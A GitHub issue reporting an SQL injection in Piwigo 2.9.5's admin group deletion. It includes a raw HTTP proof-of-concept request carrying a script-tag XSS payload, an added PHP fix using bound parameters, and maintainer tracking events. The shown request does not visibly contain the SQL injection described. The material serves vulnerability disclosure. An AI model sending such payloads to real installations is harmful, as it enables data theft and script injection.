SQL injection in group_list.php #1009

Closed
zongdeiqianxing opened this issue May 5, 2019 · 1 comment

@zongdeiqianxing

An SQL injection has been discovered in the administration panel of Piwigo v2.9.5. The vulnerability allows remote attackers that are authenticated as administrator to inject SQL code into a query and display. This could result in full information disclosure.

The vulnerability was found in the 'delete' method in admin/group_list.php, because it does not validate and filter the '$group' parameter when it gets the parameters. And the vulnerability could query any data in the database and display it on the page.

In the figure, I obtained the encrypted password of the user table.

@zongdeiqianxing
Author

```http
POST /admin.php?page=group_list HTTP/1.1
Host: 10.150.10.186:30001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.150.10.186:30001/admin.php?page=group_list
Content-Type: application/x-www-form-urlencoded
Content-Length: 430
Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=hb609s43hqj1iqrkvlrvgne5q7
Connection: close
Upgrade-Insecure-Requests: 1

pwg_token=036e74fc33b5eee65c74f44b98c09e13&group_selection%5B%5D=1&selectAction=delete&rename_1=1%3E%3Cscript%3Ealert%28%2Fgroup%2F%29%3C%2Fscript%3E&merge=%E5%9C%A8%E9%80%99%E8%BC%B8%E5%85%A5%E6%96%B0%E7%9A%84%E7%BE%A4%E7%B5%84%E5%88%A5%E5%90%8D%E7%A8%B1&confirm_deletion=1&duplicate_1=%E5%9C%A8%E9%80%99%E8%BC%B8%E5%85%A5%E6%96%B0%E7%9A%84%E7%BE%A4%E7%B5%84%E5%88%A5%E5%90%8D%E7%A8%B1&submit=%E6%87%89%E7%94%A8%E5%8B%95%E4%BD%9C
```
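
One way to close the hole described in this issue, shown as an added example that is not code from Piwigo or from the reporter: validate every `group_selection[]` value as a bare integer id before the delete action runs, and pass the ids to the database as bound parameters. The helper functions, the `demo_*` table names and the in-memory SQLite database are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not Piwigo code): accept only an array of bare decimal ids.
function parse_group_ids($raw): array
{
    if (!is_array($raw) || $raw === []) {
        throw new InvalidArgumentException('group_selection must be a non-empty array');
    }
    $ids = [];
    foreach ($raw as $value) {
        if (!is_string($value) || preg_match('/^[1-9][0-9]{0,9}$/D', $value) !== 1) {
            throw new InvalidArgumentException('invalid group id');
        }
        $ids[] = (int) $value;
    }
    return array_values(array_unique($ids));
}

// Delete with bound parameters, so an id is never concatenated into SQL text.
function delete_groups(PDO $db, array $ids): array
{
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $select = $db->prepare("SELECT name FROM demo_groups WHERE id IN ($marks) ORDER BY id");
    $select->execute($ids);
    $names = $select->fetchAll(PDO::FETCH_COLUMN);
    $db->beginTransaction();
    $db->prepare("DELETE FROM demo_group_access WHERE group_id IN ($marks)")->execute($ids);
    $db->prepare("DELETE FROM demo_groups WHERE id IN ($marks)")->execute($ids);
    $db->commit();
    return $names; // group names for the confirmation message
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE demo_groups (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec('CREATE TABLE demo_group_access (group_id INTEGER, cat_id INTEGER)');
$db->exec("INSERT INTO demo_groups VALUES (1, 'family'), (2, 'friends')");
$db->exec('INSERT INTO demo_group_access VALUES (1, 10), (2, 20)');

// Constructed inputs standing in for $_POST['group_selection'].
foreach ([['1'], ['2 trailing text'], 'not-an-array'] as $submitted) {
    try {
        echo 'deleted: ' . implode(', ', delete_groups($db, parse_group_ids($submitted))) . PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ' . $e->getMessage() . PHP_EOL;
    }
}
```

Group names returned for display should still be HTML-escaped when rendered in the admin page.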

@plegall added this to the 2.9.6 milestone May 31, 2019
@plegall self-assigned this Aug 12, 2019
@plegall changed the title from "Piwigo v2.9.5 - SQL injection in group_list.php" to "SQL injection in group_list.php" Aug 12, 2019
@plegall modified the milestones: 2.9.6, 2.10.0RC1 Aug 12, 2019